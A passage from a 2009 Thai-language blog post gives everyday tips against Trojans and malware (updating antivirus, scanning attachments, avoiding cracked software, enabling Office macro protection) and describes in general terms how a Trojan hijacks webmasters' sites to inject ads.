    เมื่อติดตั้งโปรแกรม Antivirus แล้ว ก็ต้องปรับปรุงอัพเดต Signature Database อย่างต่อเนื่องเช่นกัน โดยปกติแล้วหากโปรแกรมมีการอัพเดตจะแจ้งผู้ใช้ หรืออาจอัพเดตเองโดยอัตโนมัติซึ่งสามารถเลือกได้ เพื่อให้โปรแกรมเรารู้จัก Malware ตัวใหม่ๆ แล้วโปรแกรมก็จะเฝ้ามองพฤติกรรมของโปรแกรมอื่นๆ ที่เราใช้งานอยู่ หากพบว่าทำงานเป็น Malware ก็จะแจ้งและกำจัดได้ในทันที
  • ระวังไฟล์/โปรแกรมที่มีผู้ส่งมา
    ให้ระวังไฟล์ต่างๆ ทางอีเมล์ หรือโปรแกรม Messenger ต่างๆ เช่น msn (Windows Live Messenger, Yahoo, QQ ฯลฯ) ต้องให้มั่นใจว่าส่งมาจากคนที่เรารู้จักเท่านั้นจึงรับไว้ แต่ก่อนจะเปิดใช้งานก็ยังต้อง Scan ด้วยโปรแกรม Antivirus อีกทุกครั้ง เพราะถึงแม้จะรู้จักผู้ที่ส่งมาแต่ผู้ส่งอาจติด Malware ที่เครื่องของเขาโดยไม่รู้ตัว ทำให้่ไฟล์ที่ส่งมาอาจติดมาตัวไม่รู้ตัวอีกเช่นกัน
  • นักใช้ของเถื่อน ต้องระวังอย่างมาก !!!
    โปรแกรมต่างๆ ที่ดาวน์โหลดได้จากเว็บไม่ถูกต้องต่างๆ ที่มี keygen, crack ฯลฯ แถมมาให้ด้วย เพื่อให้สามารถสร้างรหัสผ่านหรือแก้โปรแกรมจากรุ่นทดลองให้กลายเป็นรุ่นที่ลงทะเบียนแล้วหรือตัวจริง โปรแกรมเหล่านี้มักแถม malware มาให้ ดังนั้นต้องระวังโดยการ Scan ให้ดีเช่นกัน
  • Macro Virus Protection is enabled
    ควรป้องกันไว้ก่อนแม้จะชื่อว่า Macro Virus ก็ตาม ก็อาจทำตัวเป็น Trojan ได้เช่นกัน Malware พวกนี้จะอยู่ในลักษณะเป็นโปรแกรม หรือ script เล็กๆ ที่ติดมากับเอกสารต่างๆ ได้เช่น word, excel, powerpoint ฯลฯ ในกลุ่มของ Microsoft ให้ไปที่ส่วน Setting ของโปรแกรมที่ใช้แล้วให้ Enable Macro Virus Protection เสมอ และเมื่อเปิดไฟล์หรือเอกสารต่างๆ หากไม่รู้จักการเขียนโปรแกรม Macro อยู่แล้วก็ปิดส่วนนี้ไปเลย และเมื่อมีผู้ส่งไฟล์พวกนี้มากับอีเมล์สังเกตได้จากนามสกุลไฟล์จะเป็น .doc, .docx, xls, xlsx, รูปภาพ .gif ฯลฯ อย่าคลิกโดยตรง ให้ scan ก่อนเสมอเช่นกัน ตัวอย่างการเข้าไปตั้งค่าในโปรแกรม Microsoft Word ให้เข้าไปที่ ...
    Tools -> Macro -> Securities ... (แล้วเลือกตามภาพ)

..... การใช้อินเทอร์เน็ตปัจจุบันเปลี่ยนไปมาก มีผู้คร่ำเคร่งร่ำเรียนวิชาทั้งด้านมืดและสว่าง คอยผลิตผลงานออกมาอย่างไม่ขาดสาย Trojan บางตัวเองก็ยังถูกพัฒนาเป็นเครื่องมือการตลาดทาง cyber ที่คอยขุดข้อมูลต่างๆ ของผู้ใช้งานส่งกลับมาวิเคราะห์ หรือแม้กระทั่งพยายามยัดเยียดโฆษณาเข้าไปเมื่อเวลาเปิดเว็บไซต์ หรือหากอยู่ในเครื่องผู้ที่ทำเว็บไซต์หรือกลุ่มเว็บมาสเตอร์ทั้งหลายแล้ว ก็แอบเอาข้อมูลรหัสผ่านเพื่อเข้าไปแก้ไขเว็บไซต์เองทั้งหมดโดยอัตโนมัติแล้วแทรกตัวเองเข้าไปเพื่อให้หน้าเว็บเพจต่างๆ เรียกโฆษณาของตนขึ้นมา เมื่อ Search Engine ตรวจเจอ เว็บนั้นก็จะถูกตั้งข้อหาเองว่าเป็นเว็บที่ไม่ปลอดภัยโดยแสดงหน้า Warning เตือนสีแดงๆ (ดูแล้วน่ากลัว) ผู้เข้าชมก็จะไม่กล้าเข้าเว็บนั้นสร้างความเสียหายไม่น้อย และแก้ไขยากเพราะตัว Trojan แทรกรหัสเข้าไปอย่างเยี่ยมยอด (จะเล่าต่อไปในเรื่อง Gumblar : สุดยอดโทรจันปั่นหัวเว็บมาสเตอร์)

..... แม้ Trojan และ Malware จะมีอยู่มากมายและเกิดขึ้นใหม่เรื่อยๆ ก่อกวนแล้วสร้างปัญหามากเพียงใด หากเราใช้งานด้วยสติ และทำตามหลักง่ายๆ ข้างต้นก็ช่วยให้ปลอดภัยไปได้มากแม้จะไม่ 100% เพราะเหล่านักก่อกวนก็คอยคิดค้นเทคนิคต่างๆ มาเรื่อยๆ แต่ผู้สร้าง Antivirus ก็เฝ้าติดตามอย่างต่อเนื่องให้โปรแกรมมีประสิทธิภาพสูงสุดเพื่อจะทำยอดขายได้สูงๆ และตัวเราผู้ใช้งานก็สามารถติดตามศึกษาวิธีป้องกันและเทคนิคต่างๆ ที่เค้าใช้ในการสร้างว่าทำงานอย่างไร เป็นการเพิ่มทักษะและความรู้ไปด้วย ยุคนี้หากอยู่เฉยๆ ไม่ศึุกษาอะไรไม่ใช่เป็นการหยุดนิ่งเหมือนแต่ก่อนแล้ว เพราะคนส่วนใหญ่พยายามวิ่งไปข้างหน้าตลอดเวลา หากกระโดดได้คงกระโดดไปแล้ว

tonimaxx@Jaroos.com
27 สิงหาคม 2552

(Elton John) Your Song - Sungha Jung

Posted by Apsara at 2:11 PM . Friday, August 07, 2009
0 comments

Amazing Korean boy !!!